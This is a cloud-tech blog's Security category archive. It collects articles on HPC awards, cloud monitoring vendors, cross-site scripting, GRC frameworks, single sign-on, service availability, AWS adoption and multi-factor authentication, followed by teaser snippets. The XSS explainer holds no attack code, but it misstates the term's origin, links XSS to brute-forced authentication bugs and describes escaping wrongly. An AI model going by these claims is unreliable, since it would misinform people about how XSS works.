Category Archives: Security

International Data Corporation (IDC) Lauds Innovations in Supercomputing with Innovation Excellence Awards

International Data Corporation (IDC) Lauds Innovations in Supercomputing with Innovation Excellence Awards

FRANKFURT, Germany, June 21, 2016 – International Data Corporation (IDC) today announced the tenth round of recipients of the HPC Innovation Excellence Award at ISC16, a major international supercomputing conference, in Frankfurt, Germany. This year’s winners include The Centre for Computational Medicine, University of Toronto; Walt Disney Animation Studios; DreamWorks Animation; Fortissimo/Ergolines GPUdb; United States Postal Service; Novartis/Amazon Web Services (AWS)/Cycle Computing; and the University of Rochester Medical Center. They join the elite ranks of over 60 previous recipients from around the world, the first having been announced in 2011.

The HPC Innovation Excellence Award recognizes noteworthy achievements by users of high performance computing technologies. The program’s main goals are to showcase return on investment (ROI) and scientific success stories involving HPC; to help other users better understand the benefits of adopting HPC and justify HPC investments, especially for small and medium-size enterprises (SMEs); to demonstrate the value of HPC to funding bodies and politicians; and to expand public support for increased HPC investments.

IDC research has shown that HPC can accelerate innovation cycles greatly and in many cases can generate return on investment. The ROI program aims to collect a large set of success stories across many research disciplines, industries, and application areas,” said Earl C. Joseph, Ph.D., IDC’s program vice president for High-Performance Computing (HPC) and executive director of the HPC User Forum. “The winners achieved clear success in applying HPC to greatly improve business ROI, scientific advancement, and/or engineering successes. Many of the achievements also directly benefit society.”

Read Full Release: IDC

15 Cloud Data Performance Monitoring Companies

15 Cloud Data Performance Monitoring Companies

Cloud Data Performance Monitoring Companies

(Updated: Originally Published Feb 9th, 2015) We have decided to put together a small list of some of our favorite cloud performance monitoring services. In this day and age it is extremely important to stay on top of critical issues as they arise. These services will accompany you in monitoring your data and safeguarding critical applications and websites in real-time. This list is in no particular order of preference. When selecting a new service, please do your own due diligence during the selection process.



Copperegg has been in business since 2010 and has made a good name for themselves securing clients such as: Juniper Networks, REAL Networks and SEGA. Some of their features include the ability to monitor server CPU Processes, receive real-time alerts as well as collect, analyze, and alert on any metric.



DataDog is a startup based out of New York which has recently secured $31 Million in series C funding. They are quickly making a name for themselves and have a truly impressive client list with the likes of: Adobe, Salesforce, HP, Facebook and many others.



Keynote has been around since 1995 and have an impressive client list with the likes of: Akamai, AT&T, BBC, IBM, SAP and many others… Keynote solutions test from the user perspective, delivering high-volume traffic on demand and accurately modeling interaction, arrival patterns, and geographic diversity.



Kaseya Traverse has been in business since 2000 and is a cloud and service level management platform, with proactive monitoring and powerful root-cause analytics for all aspects of the IT environment – applications, databases, network infrastructure, cloud services, servers, data center equipment and VoIP. They have several case studies with a large client list including: Staples, University of Kentucky and Virginia Tech.



Soasta was founded in 2006. They provide seamless integration of test design, monitoring, and reporting of high quality Web applications and services. Their client list includes: Hallmark, Microsoft and Nordstom among many others.



Up.time began in 2002 and provides deep server monitors that monitor the performance of critical applications, databases, Web servers, network devices, and critical system-level services. You can choose from any of up.time’s built-in server monitors, application monitors and quickly define your own custom probes. Their impressive client list includes: Cisco, NASA, Sony, Ford and many other high profile brands.

Solar Winds

SolarWinds has been in business since 1999. There services can monitor all the infrastructure in your datacenter using WMI, SNMP, CIM, JMX & VMware® API protocols. Their client list includes a high number of Governmental agencies most notably: NSA, U.S Army, Department of Homeland Security and many others.



Monitis has been in business since 2006 and their client list includes the likes of: AVIS, Survey Monkey, Stanford University and the University of Cambridge. They offer a Universal Cloud Monitoring Framework, Monitis can sync to other Cloud computing providers such as Rackspace, GoGrid, Softlayer, and many more. Their Universal Cloud Monitoring Framework will automate monitoring in highly dynamic cloud environments.



Opsview has been in business since 2002. Opsview provides advanced auto-discovery and integrated GUI with quick straightforward configuration. Some of their clientele includes: Active Networks, Cornell University and MIT. 



Apica was formed in 2005. Apica offers companies and developers, cloud-based load testing and web performance monitoring tools to test applications for maximum capacity, daily performance, improved load times, and protection from peak loads. Analyze online performance and pinpoint bottlenecks quickly and effectively.  Their partners include: Rackspace, Rightscale, AWS and many others.



Loadstorm has been in business offering SaaS products since 1999. Their Load testing service allows web developers to know how their applications respond under heavy volumes of HTTP traffic. LoadStorm puts massive cloud resources in the hands of web developers to enable them to improve the performance of their web applications. Create your own test plans, and generate up to 50,000 concurrent users in realistic scenarios.



CloudHarmony are relatively new in comparison to their counterparts. They formed in 2009 and have been developing some very useful tools. You may use their extensive and continuously updated benchmarks to view and compare performance metrics from various cloud providers and services. One of our favorite areas is the useful Cloud Square provider directory.

Amazon CloudWatch

Amazon CloudWatch
Part of the highly cost efficient Amazon Web Services (AWS) group, CloudWatch is a fairly basic, though very dynamic, tool that collects, monitors and tracks customizable data metrics. The Dashboards are interactive, allowing you to manually change categorizations and matrices through a very accessible API.

Oracle Cloud

Oracle Cloud
Oracle Cloud utilizes a complex interchange of software to provide insights on actual, and applicable, data flow. It is a tool that is flexible and can provide massive insight with any set of data. Oracle offers “experts in every industry” and is truly well rounded, reaching 110 million households and extracting data from 1,500 partners.


SevOne boasts ‘user friendliness’ with the ability to view metric, flow, and log data, all in a single dashboard. With alliances like Cisco and Dell, SevOne is far reaching, utilizing Networks, 4GLte, and the “Hybrid Cloud” to standardize cloud infrastructure and alleviate visibility gap risk. In 2013, SevOne received a $150 million investment from Bain Capital, and in both 2015 and 2016, received various awards for business promise and software success.

By Glenn Blake

Cross-Site Scripting – Why Is It A Serious Security Threat For Big Data Applications?

Cross-Site Scripting – Why Is It A Serious Security Threat For Big Data Applications?

Security Threat And Big Data Applications

IBM, Amazon, Google, Yahoo, Microsoft – and the list goes on. All these leading IT enterprises have been affected by Cross-Site Scripting (XSS) attacks in the past. Cross-Site Scripting ranks third in the list of top-10 web application vulnerabilities listed by the Open Web Application Security Project (OWASP) – a worldwide non-profit community focused on improving the security of web applications.

What is Cross-Site Scripting?

dark-dataThe history of ‘Cross-Site Scripting’ vulnerability dates back to the middle of 90’s decade. It was Microsoft who first introduced the term to refer to a security flaw specific to ASP.NET environment that made dynamically generated HTML pages vulnerable to malicious scripting attacks.

Cross Site Scripting (XSS) can be defined as the process of inserting malicious code to a web environment to compromise the security of the system. It is a client-side attack where an attacker injects specifically coded scripts through a web browser program. The code appears to have originated from a trusted source and the browser executes the script – resulting in the attacker gaining access to the system. A host of scripting languages, including JavaScript, VBScript, Flash or HTML/CSS, can be used to launch XSS attacks on vulnerable web-based systems and applications.

How Cross-Site Scripting Relates to Big Data Projects?

Cross-Site Scripting is a web-based vulnerability that can affect all Big Data Projects that use web-based systems, tools or applications. As most of the data analytics and business intelligence applications are interactive web-based solutions (that accept and execute user inputs), there is always the possibility of cross-site scripting attacks if the inputs are executed without validation.


(Image Source: Shutterstock)

Web-based applications continue to fall prey to Cross-Site Scripting attacks as they are mostly interactive. That means, they need to accept inputs from the users and return the output based on the inputs received. This gives an attacker the opportunity to manipulate the inputs and insert malicious scripts or commands through normal input channels.

Cross-Site Scripting – Behind the Scene:

Cross-Site Scripting attacks mainly exploit authentication bugs in the application layer to insert scripts that are executable on the client side. Typically the attack vector is based on brute force to hijack legitimate user sessions. Such attacks bypass access control policies to help the attacker take the identity of a valid user. Cross-site scripting has the ability to elevate the hacker in gaining administrative control on the application server – thus compromising the security of the entire environment.

The risk of XSS is not limited to Big Data applications alone. All types of web-based solutions are vulnerable to cross-site scripting attacks. By injecting malicious executable scripts into the application layer, a hacker can gain control of underlying databases, user credentials and other sensitive information that are maintained by the application. Information gathered from the initial attack can subsequently be utilized for conducting more sophisticated hacking attempts to compromise the security of the entire project.

How to Prevent Cross-Site Scripting Attacks?

Contextual Input Encoding (Escaping) Techniques:

Escaping techniques, if implemented correctly, can significantly alleviate the prospect of XSS attacks. It is a form of contextual input encoding where the web browser is informed to treat specific strings of code as plain text characters.

In case an attacker manages to insert an executable script as an input to the application, the browser would first validate the input before executing. If it matches with the specific strings that are supposed to be interpreted as plain text, it would terminate the session without executing the script.

HTML, CSS, JavaScript – all have their own set of escaping libraries. Instead of rolling out your own escaping codes, it is better to make use of a reputable escaping library.

Vulnerability Scanner:

Quite a few reputed anti-virus software manufacturers have come up with vulnerability scanner suites that can detect possible XSS attack areas. You should seriously consider getting one for your project. The scanner crawls the entire set-up, consolidates all the findings and lists down the weak areas which are susceptible to cross-site scripting attacks.

Penetration Testing:

Another effective measure to identify XSS vulnerability is penetration testing. Find out the possible gateways from where an attacker could gain entry to the application and try from your end to exploit those vulnerable areas. If you are successful in breaking into the system, then you need to investigate the issue further to find the root cause. Once the root cause gets identified, you can engage your developers to come up with a preventive measure.

Browser Security Features:

All major web browser programs have a built-in security feature – Response Header – that can be used to combat XSS attacks. You could make use of Content-Security-Policy header to specify how the browser would deal with script tags. You can enable execution of scripts from specific domains, while block this functionality for other domains. This technique is also known as whitelisting.

By Jack Danielson,

Jack is a tech enthusiast, geek and writer. He is particularly interested in the proliferation of Big Data tips ­ tricks around the web. He holds the position of consultant writer at Satellite Broadband ISP, a resource site to help people living in rural areas find high speed satellite Internet service providers in their area such as Wilblue Exede and HughesNet Gen4.

Adopting A Cohesive GRC Mindset For Cloud Security

Adopting A Cohesive GRC Mindset For Cloud Security

Cloud Security Mindset

Businesses are becoming wise to the compelling benefits of cloud computing. When adopting cloud, they need a high level of confidence in how it will be risk-managed and controlled, to preserve the security of their information and integrity of their operations. Cloud implementation is sometimes built up over time in a business, while the technology and cybersecurity around it constantly evolves. This can lead businesses to finding themselves with a fragmented approach to cloud control and security, and this needs to be avoided through the implementation of a cohesive governance, risk and compliance (GRC) framework.

Cloud services are big business. In 2019, IDC predicts that worldwide spending on public cloud services will be $141 billion while last year, Amazon Web Services achieved net sales of $7.88 billion. Businesses get on board with cloud to perform better, to meet targets and objectives by being leaner, faster and more cost-effective.

Cloud helps businesses minimize the capital investment and maintenance costs of hardware and infrastructure. It supports rapid scaling up and down as needs dictate and brings elasticity to business operations, facilitating the addition and removal of user access more quickly and easily. Project deployment with cloud can be a more agile and faster affair. Efficient business operations are supported through improved access and information retrieval, while disaster recovery measures include robust backup and controls.

Being clear on risk

In the early days of cloud there were security concerns. It seemed to follow that assets residing ‘somewhere else’ were more at risk. Ownership and control of infrastructure gives a perception of security. However, the walls of a data center can be vulnerable to professional hackers, therefore it doesn’t automatically follow that infrastructure ownership provides greater security.


(Image Source: Shutterstock)

Cloud is a service based delivery model typically involving an infrastructure provider, a platform provider and a software provider. While service procurement of an IT solution delivers some benefits it also comes with some of its own risks. These include shared technology issues, the risk of insufficient due diligence and service reliability. And of course, it cannot be immune to the threat of data breaches and other potential security issues or data loss.

Clarity on the division of labor between company and service provider is an essential first checkpoint of a robust cloud service model – what are you responsible for? What is the service provider? This covers situations that include incident handling and virus infection on storage. Who manages such situations, should they arise, depends on the chosen service model. And this needs to be completely clear and transparent – there is nothing more valuable to a business than its data; its protection can’t be only half understood, governance around all aspects is essential.

Secure cloud service provision

The right cloud architecture is a second critical consideration. Virtualization was the first phase of cloud adoption now, isolation of data is also an imperative. While we saw multi-tenant solutions adopted first, the call is now for multi-instance to guarantee separation of company data. This is important because some regulation requires proof of data segregation and it also provides greater flexibility with faster implementation of changes.

A cloud solution should also provide federated identity management so that the business has control over the access its users and devices have. As users move around in the organization the system needs to be resilient to managing segregation of duties.

For continuous security assurance, quarterly or monthly testing is not enough. Real-time dashboards are needed and should be a part of the service model.

Cloud service providers are now adopting industry standard GRC solutions that include segregation of duties, change management, continuous monitoring and reporting and analytics. For best practice secure cloud implementation, businesses should start with a robust GRC framework, assess cloud service providers meeting industry standards against that framework, and then ensure governance and control through service level agreements and continuous monitoring.

The GRC framework


For a single source of truth on regulatory compliance, security and control, the company’s GRC framework should apply across the complete cloud infrastructure and cover:

  • Continuous system controls monitoring – as business data and applications are mission critical
  • Penetration testing and audit management – conducted to a defined schedule
  • Incident response management – this is the norm with internally controlled assets and there should be no difference with cloud implementation. The process needs to detail response activities that kick-in immediately in the event of a security problem
  • Compliance controls testing – the specifics of this will depend upon the industry as particular requirements will apply in the likes of healthcare and finance
  • Disaster recovery and business continuity – this is about more than demonstrating disaster recovery on paper, the theory needs to be tested through disaster recovery operations
  • Onsite and offsite backup audits – on a regular basis.

In addition, a comprehensive GRC framework will also cover data encryption audits, forensics log management and reporting, elasticity and load tolerance testing, advanced cyberattack prevention measures and advanced cloud security analytics.

Resilience and control

Effective governance and control is integral to business success and growth. A risk-managed company is more resilient to market and situational change. The culture and practice of risk management and control has to come from the top down, permeating the organization’s entire operations. As well as defining and enforcing the policies for complete cloud implementation across all instances and cloud providers, the GRC framework should also serve as the template against which future providers can be evaluated.

With a GRC framework on cloud, businesses can expect enhanced information security, compliance and risk management, the highest levels of reliability and operational control and continuous transparency and confidence. Business continuity will be robust with disaster recovery measures in place. Also, regulatory mandates will be complied with.

GRC on the cloud is a way of ensuring security risks are completely understood, and that management through manual processes and firefighting in the event of an incident are avoided. It is also a way of smoothly managing change when business decisions require it.

The right GRC approach will support informed decision-making and ongoing management, putting your business in a better position to reduce risk and to realize the benefits of cloud in enhancing business performance.

By Vidya Phalke, Chief Technology Officer at MetricStream

Cloud Access Management: Access Everywhere

Cloud Access Management: Access Everywhere

Cloud Access Management

As the utilization of cloud applications has become a standard of using in nearly every industry, there needs to be solutions available to help manage these applications. One way for admins to effectively manage their organization’s applications is to use an automated account management solution for both in house and cloud applications. This ensures ease of provisioning, making changes and de-provisioning user accounts, while also ensuring security by ensuring correct access rights.

While this ensures ease of use for account admins, what about for the end users? They also need a way to easily manage, and access, their cloud applications. Think about a user who has numerous applications they use on a daily basis. They need to open a new page for each application and then sign in. In today’s work environment, in virtually every industry, employees frequently access work applications outside of the company network. While this might not be so much an inconvenience in the office regularly, for those who are working on the go it can be extremely annoying. Solutions are available to allow users to easily manage and access their applications from any location.

(Image Source: Shutterstock)

How does it work?

A web-based single sign-on (SSO) solution is one method ends users can to easily handle cloud applications. Users can easily access a portal where all applications they can access are available. They simply provide a single set of credentials for authentication and can then access any of their applications by simply clicking on the icon. This allows them to easily access their applications from anywhere that they are working, whether inside or outside of the company’s network from one place.

This is extremely convenient for users who are using mobile devices. Think of an employee who is quickly trying to gain access on their smartphone or tablet. To open each application in a new tab and enter credentials is an extremely time consuming process. Many vendors offer the ability for users to download an app on their device and the app will prompt the user to enter a single set of credentials to get to the portal where they can access their applications. For users who are on the go and use tablets or smartphones this can be a tremendous help. They can access what they need, from anywhere, at any time, without having to be inconvenienced.

A cloud SSO solution is helpful in many different types of organizations. For example, in education, students complete a large majority of their work outside of the school’s network and often use many mobile devices. In the healthcare industry, clinicians will be going room to room visiting patients. Sometimes caregivers are logging into terminals, other times they may use a tablet and need to quickly access the applications and systems they need. For a sales associate for a large organization, they may be meeting customers at their office or other locations and need to access customer information. Many industries nowadays have employees who are not working from one single computer and need quick convenient access.

How Can This Actually Enhance Security?


A major concern of every organization when implementing any type of solution is also security. While yes, they want their employees to be more productive and be able to more easily perform task and access resources they need, they don’t want this to interfere with the security of their network.

The first big concern people always have with SSO solutions is that they are nervous that it leaves the network unsecure, as users only use one set of credentials. Think, though, about the user who has several sets of complex credential for the multitude of applications that they need. Chances are that they write them down or save them in their phones to remember these passwords. It is actually more secure to have a single set of credentials that the user does not need to write down since they can easily remember them.


If security is a top priority, this type of solution can be customized to ensure additional levels of security measures. In some industries certain employees handle highly sensitive information so security is the utmost concern. For example, for an employee working in the financial department handling company or customer finances, it is very important to add additional security methods while it may not be as important to ensure security for applications that an intern uses. Depending on the level of security needed there can be different methods of authentication required.


For the user working in the financial department, the solution can be set up so that it can be required that they enter their credentials and then have to provide a second form of identification. This can be some a one time use PIN, access card or maybe a biometric method such as a fingerprint or face scan.

Cloud SSO solutions can also be customized to meet the needs of the many different groups and positions which many organizations have. For example, it is obvious that certain departments within the organization use different applications than others. The organization can easily add and delete applications for each group. They can also break down groups differently depending on their organizational needs. Different levels of employees within a department will probably need different access to systems and applications. The company can easily develop groups so that each employee only has the applications in their portal that they need.

Cloud single sign-on solutions allow employees to easily see which applications they have, and access them with a single click and one set of credentials. This improves efficiency and productivity while also keeping the organization happy by ensuring security.

By Dean Wiech

Cloud Services Providers – Learning To Keep The Lights On

Cloud Services Providers – Learning To Keep The Lights On

The True Meaning of Availability

What is real availability? In our line of work, cloud service providers approach availability from the inside out. And in many cases, some never make it past their own front door given how challenging it is to keep the lights on at home let alone factors that are out of your control. But in order to effectively provide quality services with the focus on the customer, providers need to ensure availability from all perspectives, this is what we like to call real availability. Real availability captures the real user experience from end to end. This includes everything within our control (our infrastructure and network) and things out of our control (customer or third party providers).

It’s not enough to only consider the factors within our own infrastructure that might lead to more down time or further disruption. Even when achieving 100 percent uptime within your own network, you have to recognize the services being used by the customer are only as good as the weakest point in the process. A hardware failure on the customer side or an outage at the internet service provider are all factors that impact the overall availability of the services. And while you should do all you can to not be the weak link, from a customer’s point of view, a disruption is a disruption regardless of the source.

Looking Through the Eyes of the Customer


(Image Source: Shutterstock)

By shifting your focus to see the situation as the customer sees it, and providing a real world view of their availability, cloud service providers should take the necessary steps to change the way the industry looks at and measures availability. To determine real availability for your customers, providers need to look at every incident that results in a customer disruption. In our experience, incidents in a customer’s network fall into one of the following four categories:

Service provider’s infrastructure This includes any and all disruptions that occur on the service provider’s end, within their infrastructure.

Software on a service providers’ platform – Additional software programs from the service provider that experiences a glitch or outage.

Third-party provider Includes third-party solutions such as a customer’s internet service provider or your chosen data center management or hosting services provider.

The customerWhen customers have internal network issues, authentication issues, or when they use the service providers’ offering in ways that impacts their own service.

Moving From Supplier to Partner is Good Business

Where you come in is helping your customers manage the situation when those disturbances occur, including identifying the source. By considering all points of the process when identifying factors that could lead to downtime, you are proactively partnering with your customers. This partnership and transparency is critical to your customer relationships and will dramatically improve the customer experience.


(Infographic Source: Kissmetrics)

By evolving your status from supplier to a partner dedicated to a customer’s success also makes good business sense. While many cloud providers focus on new customer/user acquisition, industry studies show it can cost 7x more than customer retention. Broadening a focus to the real availability and health of a cloud service can pay off for providers in the long run.

By Allan Leinwand

Why Organizations Move To Amazon AWS

Why Organizations Move To Amazon AWS

Maximization of Cloud Opportunities 

Sponsored series by CloudMGR

When linked with the correct choice of provider, visibility and control in the cloud provide organizations with security as well as cost savings, speed, agility, efficiency, and innovation. Amazon Web Services (AWS) is one such provider which allows for the maximization of cloud opportunities, promising scalability, the elimination of capital expenses, and no latency.

Why Organizations Move to AWS

Economics & Infrastructure

Pay-per-use models are attractive to both small startups and gigantic corporations, and significant cost savings are available for those with unique and individually defined computing needs. Moreover, AWS requires no investment in physical hardware or space due to their globally distributed data centers, and when implementing AWS, organizations benefit from enhanced performance and improved disaster recovery.


While AWS provides a self-service model, organizations typically don’t require the same quantity and level of IT staff. Tasks such as data center maintenance are managed by Amazon, and many organizations make use of management providers for superior optimization and governance.

Innovation through Responsiveness & Agility

Organizations are working hard to out-perform, out-deliver, and out-innovate their competitors, and with its majority cloud market share, Amazon is one of, if not the, fastest innovators in its space. Further, AWS lets companies develop and deploy applications quickly with instant access to nearly limitless computing power. It is an enabler of corporate innovation due to the fact that companies running AWS can move faster and be more agile than their competitors.


While AWS provides a self-service model, organizations typically don’t require the same quantity and level of IT staff. Tasks such as data center maintenance are managed by Amazon, and many organizations make use of management providers for superior optimization and governance.


Responsiveness & Agility organizations to quickly increase capacity, reduces downtimes, encourages rapid experimentation and innovation, and increases global reach. Additionally, AWS lets companies develop and deploy applications quickly with instant access to nearly limitless computing Security

With security one of the biggest concerns in all of IT, Amazon holds a range of the most essential certifications, including HIPAA, PCI, ISO, and Sarbanes-Oxley. It also maintains separation of logical and physical access to data for further protection, and it’s unlikely that more than a handful of businesses around the world are able to match Amazon’s provisions.

data centers are distributed across the world, and multiple, independently operated data centers per region provide different failure domains. When implementing AWS, organizations benefit from enhanced performance and improved disaster recovery.

5 Steps to Organization-Wide Visibility & Control of AWS

craig-devesonThough the choice drivers for AWS adoption are clear, organizations often fail to realize the promised benefits of cloud due to a lack of visibility and control of their cloud infrastructure at each stage of their cloud adoption journey.

Craig Deveson, founder, and CEO of CloudMGR, suggests a five-step plan for organization-wide visibility and control of AWS:


  1. Develop a visibility framework
  • Determine what’s actually running.
  • Bring visibility to cloud consumption with tools such as AWS console, AWS API, 3rd party billing, and cost management devices.
  • Standardize which services are used so that business units can build on and adapt them.
  • Control shadow IT.
  1. Tap into the partner ecosystem
  • Use technology partner tools to simplify billing and cost management, set up a self-service portal, and perform optimization tasks.
  • Leverage the consulting partner network to perform migration tasks, develop governance practices, and outsource service management.
  1. Move culture from CapEx to OpEx
  • Because CapEx has long been the central budgeting mechanism for businesses, OpEx will require a change in thinking from IT and finance: establishing comfort with distributed access, resource responsibilities beyond IT, and avoiding “out of sight, out of mind” thinking.
  1. Create a governance structure
  • Needless to say, maintaining compliance with best practices, corporate governance requirements, and security by corporate users and service providers is essential. Develop a usage and control policy, control risk with cloud governance, manage access and permissions, and review compliance via regular audits.
  1. Build self-service capability
  • Finally, giving teams the agility to experiment and be innovative, provide controlled access that lets team members manage their own resources. This includes on-demand access, automation tools, and cost control mechanisms


CloudMGR’s objective is to “give businesses the visibility and control required to get the most from their cloud” by connecting all of an organization’s important systems into a single platform. CloudMGR develops a visibility framework and allows the creation of a central control dashboard. This means moving from a CapEx to OpEx culture with chargebacks and cost centers, as well as the development of self-service capability through the CloudMGR White Label service. Making it easier for teams and leaders to understand cloud resource usage, CloudMGR recognizes that a move to the cloud doesn’t guarantee full exploitation of its many benefits and so provides the tools companies need to achieve maximum operational efficiency from their cloud environments.


By Jennifer Klostermann

Do Not Rely On Passwords To Protect Your Online Information

Do Not Rely On Passwords To Protect Your Online Information

Password Challenges 

Simple passwords are no longer safe to use online. John Barco, vice president of Global Product Marketing at ForgeRock, explains why it’s time the industry embraced more advanced identity-centric solutions that improve the customer experience while also providing stronger security.

Since the beginning of logins, consumers have used a simple username and password to secure their sensitive information across the Internet. This approach made do in the early days of ecommerce, but with the rampant growth of phishing and other fraudulent activity, it’s time for a new industry standard. For businesses everywhere, this need for change has created important questions about how to protect sensitive information in a cost-effective manner, without diluting customer usability and convenience.

Everyone is on mobile, which calls for more security on-the-go

cloud_200The mass adoption of mobile devices presents the most obvious need for greater online security control. The sheer number of mobile devices around the world means organizations can implement more robust, two-factor or multi-factor authentication systems without having to worry about the high cost of providing the devices to consumers themselves. Under a two-factor authentication system, traditional usernames and passwords remain the first step in identity verification, but users are then required to input a second authentication factor to further verify who they are. This involves sending a unique code or password to a user’s mobile device; the user must input this along with his or her credentials to be granted access. Multi-factor authentication systems such as the Apple iPhone TouchID add a biometric factor such as a fingerprint.

Mobile-based authentication, which is gradually becoming the benchmark standard for online businesses, gives peace of mind to consumers. However, such authentication is not without its issues. Mobile devices are not always secure, and unfortunately, a growing volume of malware is specifically programmed to target them. Such malware can allow criminals to scrape verification codes directly from devices if the codes are sent over data networks. The impact of mobile-based authentication on the user experience is also a concern, as many consumers do not want to have to enter multiple passwords every time they access their online accounts.

Next-gen security goes biometric

Adding biometric layers such as fingerprint or facial recognition technology, or messaging-based authentication processes could be the answer to the woes of mobile-based authentication. Biometrics could further boost security, with minimal impact on the user experience. As pointed out in a recent Gartner report, “Smartphone devices can make use of network-based push notification services that provide a secure out-of-band authentication channel. Authentication servers send notifications via the smartphone OS vendor. These messages are routed to a preregistered device and awaken a local app that can further authenticate the user via contextual information, PIN/password or biometric method. After successful local authentication, the app notifies the requesting authentication service of success, which completes the out of band (OOB) loop.” High-end smartphones offer these capabilities, but until they are more widely available, biometric authentication is unfortunately unlikely to be a viable solution for the majority of consumers.

Another alternative is to add extra layers, such as push authentication, to the two-factor process; this increases security but does not impact the customer experience. When first-time consumers sign into a website that uses push authentication, they will be asked to scan an on-screen Quick Response (QR) code with their mobile devices. This creates an ‘ID tether’ between users and their devices. The next time the user logs in, a push notification is sent to his or her device; all the user has to do is tap ‘approve’ in order to proceed. Importantly, these messages are usually sent over a different network, usually the cellular network, making interception by malware or other criminal monitoring of data activity extremely difficult.

Behavior-based monitoring will become an industry standard


(Image Source: Shutterstock)

End users’ demand for multifactor authentication has accelerated in recent months, and businesses are more aware of the threats posed by online criminal activity, which makes major news headlines almost daily. Multifactor authentication, however, still relies upon a lock and key approach to online security. This means that once someone is through the front door (i.e., they have gained entry to the account), there are usually no other obstacles between them and the sensitive data contained within. For these reasons the most forward-thinking organizations are looking to implement solutions that offer adaptive risk authentication and continuous security.

Adaptive risk authentication and continuous security provide an on-going view of online security. Which means that just because someone has gained access to an account, it does not mean they have full and free access to the data within the account. Adaptive risk authentication scores user behavior based on key criteria such as IP address, device ID, number of failed login attempts and more to establish if the behavior is consistent with established ‘normal’ user behavior patterns. Any deviations outside of the norm result in a higher risk score, which triggers additional security questions, re-authentication or, if necessary, the removal of the token assigned to the online session. Most importantly, algorithms responsible for scoring each session run silently in the background. Users are only made aware of them if their behavior is deemed to be suspicious. The user experience is not compromised in any way, despite the higher levels of security in place.

Usernames and passwords are not dead just yet. They will continue to have their place online for a while, but it is increasingly obvious that in isolation, they are no longer enough to keep sensitive information safe. Thankfully for consumers, advanced security such as multifactor authentication, adaptive risk and continuous security is on the horizon. Inevitably, even the most robust lock-and-key solutions will give way to more reliable behavior-based monitoring, as the fight to keep sensitive data secure online continues to evolve.

By John Barco

John Barco, ForgeRock _headshotJohn Barco is vice president of Global Product Marketing at ForgeRock. John has 20+ years of experience building innovative products for enterprise customers, focusing on identity and access management for the last 12 years. Prior to joining ForgeRock, he served as Senior Director of Product Management for the Identity Management group at Sun. John has also held leadership positions at iPlanet, Silicon Graphics, NComputing, and IronKey. He holds a degree in industrial engineering from Missouri State University.

CloudTweaks Comics
Update: Timeline of the Massive DDoS DYN Attacks

Update: Timeline of the Massive DDoS DYN Attacks

DYN DDOS Timeline This morning at 7am ET a DDoS attack was launched at Dyn (the site is still down at the minute), an Internet infrastructure company whose headquarters are in New Hampshire. So far the attack has come in 2 waves, the first at 11.10 UTC and the second at around 16.00 UTC. So…

Reuters News: Powerfull DDoS Knocks Out Several Large Scale Websites

Reuters News: Powerfull DDoS Knocks Out Several Large Scale Websites

DDoS Knocks Out Several Websites Cyber attacks targeting the internet infrastructure provider Dyn disrupted service on major sites such as Twitter and Spotify on Friday, mainly affecting users on the U.S. East Coast. It was not immediately clear who was responsible. Officials told Reuters that the U.S. Department of Homeland Security and the Federal Bureau…

A New CCTV Nightmare: Botnets And DDoS attacks

A New CCTV Nightmare: Botnets And DDoS attacks

Botnets and DDoS Attacks There’s just so much that seems as though it could go wrong with closed-circuit television cameras, a.k.a. video surveillance. With an ever-increasing number of digital eyes on the average person at all times, people can hardly be blamed for feeling like they’re one misfortune away from joining the ranks of Don’t…

Security and the Potential of 2 Billion Device Failures

Security and the Potential of 2 Billion Device Failures

IoT Device Failures I have, over the past three years, posted a number of Internet of Things (and the broader NIST-defined Cyber Physical Systems) conversations and topics. I have talked about drones, wearables and many other aspects of the Internet of Things. One of the integration problems has been the number of protocols the various…

Micro-segmentation – Protecting Advanced Threats Within The Perimeter

Micro-segmentation – Protecting Advanced Threats Within The Perimeter

Micro-segmentation Changing with the times is frequently overlooked when it comes to data center security. The technology powering today’s networks has become increasingly dynamic, but most data center admins still employ archaic security measures to protect their network. These traditional security methods just don’t stand a chance against today’s sophisticated attacks. That hasn’t stopped organizations…

Three Reasons Cloud Adoption Can Close The Federal Government’s Tech Gap

Three Reasons Cloud Adoption Can Close The Federal Government’s Tech Gap

Federal Government Cloud Adoption No one has ever accused the U.S. government of being technologically savvy. Aging software, systems and processes, internal politics, restricted budgets and a cultural resistance to change have set the federal sector years behind its private sector counterparts. Data and information security concerns have also been a major contributing factor inhibiting the…

The Cloud Is Not Enough! Why Businesses Need Hybrid Solutions

The Cloud Is Not Enough! Why Businesses Need Hybrid Solutions

Why Businesses Need Hybrid Solutions Running a cloud server is no longer the novel trend it once was. Now, the cloud is a necessary data tier that allows employees to access vital company data and maintain productivity from anywhere in the world. But it isn’t a perfect system — security and performance issues can quickly…

The Fully Aware, Hybrid-Cloud Approach

The Fully Aware, Hybrid-Cloud Approach

Hybrid-Cloud Approach For over 20 years, organizations have been attempting to secure their networks and protect their data. However, have any of their efforts really improved security? Today we hear journalists and industry experts talk about the erosion of the perimeter. Some say it’s squishy, others say it’s spongy, and yet another claims it crunchy.…

Using Private Cloud Architecture For Multi-Tier Applications

Using Private Cloud Architecture For Multi-Tier Applications

Cloud Architecture These days, Multi-Tier Applications are the norm. From SharePoint’s front-end/back-end configuration, to LAMP-based websites using multiple servers to handle different functions, a multitude of apps require public and private-facing components to work in tandem. Placing these apps in entirely public-facing platforms and networks simplifies the process, but at the cost of security vulnerabilities. Locating everything…

Digital Transformation: Not Just For Large Enterprises Anymore

Digital Transformation: Not Just For Large Enterprises Anymore

Digital Transformation Digital transformation is the acceleration of business activities, processes, and operational models to fully embrace the changes and opportunities of digital technologies. The concept is not new; we’ve been talking about it in one way or another for decades: paperless office, BYOD, user experience, consumerization of IT – all of these were stepping…

Adopting A Cohesive GRC Mindset For Cloud Security

Adopting A Cohesive GRC Mindset For Cloud Security

Cloud Security Mindset Businesses are becoming wise to the compelling benefits of cloud computing. When adopting cloud, they need a high level of confidence in how it will be risk-managed and controlled, to preserve the security of their information and integrity of their operations. Cloud implementation is sometimes built up over time in a business,…

The Security Gap: What Is Your Core Strength?

The Security Gap: What Is Your Core Strength?

The Security Gap You’re out of your mind if you think blocking access to file sharing services is filling a security gap. You’re out of your mind if you think making people jump through hoops like Citrix and VPNs to get at content is secure. You’re out of your mind if you think putting your…


Sponsored Partners